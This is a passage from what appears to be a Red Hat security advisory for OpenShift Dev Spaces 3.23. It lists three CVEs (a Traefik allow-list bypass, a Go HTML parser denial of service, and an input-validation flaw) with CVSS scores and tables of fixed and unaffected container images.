Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le		—

Threats

Impact Moderate

CVE-2024-39321

An authorization bypass vulnerability was found in Traefik. This flaw allows bypassing IP allow-lists via HTTP/3 early data requests in QUIC 0-RTT handshakes sent with spoofed IP addresses.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE-639 - Authorization Bypass Through User-Controlled Key

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64	—	Vendor Fix fix Workaround

Known not affected 50 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le	—	Workaround

Threats

Impact Moderate

CVE-2024-45338

A flaw was found in golang.org/x/net/html. This flaw allows an attacker to craft input to the parse functions that would be processed non-linearly with respect to its length, resulting in extremely slow parsing. This issue can cause a denial of service.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-770 - Allocation of Resources Without Limits or Throttling

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le	—	Vendor Fix fix

Known not affected 50 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le		—

Threats

Impact Important

CVE-2025-9287

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:L

CWE-20 - Improper Input Validation

Affected products

Fixed 12 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x	—	Vendor Fix fix Workaround
